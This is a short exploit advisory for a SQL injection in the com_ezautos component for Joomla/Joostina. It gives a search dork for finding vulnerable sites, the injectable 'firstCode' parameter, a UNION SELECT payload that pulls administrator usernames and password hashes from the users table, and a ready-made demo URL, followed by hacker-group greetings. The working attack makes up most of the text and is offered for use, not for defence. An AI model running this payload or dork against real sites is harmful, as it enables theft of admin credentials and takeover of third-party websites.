Joomla (joostina)  Component com_ezautos SQL Injection Vulnerability
 
###########################
 
Author : Gamoscu
 
Homepage : http://www.1923turk.com
 
Blog :http://gamoscu.wordpress.com/
 
Script : Joomla http://www.joostina-cms.org/content/view/20/35/
 
Dork : inurl:com_ezautos
###########################
 
[ Vulnerable File ]
 
index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 [ SQL ]
 
[ XpL ]
 
+and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1--
 
[ Demo]
 
http://xxxxx/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1+and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1--
 
##############################################################
#
#
#
# Baybora: http://baybora.wordpress.com/
#
# Manas58 Â– Delibey Â– Tiamo Â– Psiko Â– Turco Â– infazci Â– X-TRO
#
#
#
#            #Elektrikist#
#
#############################################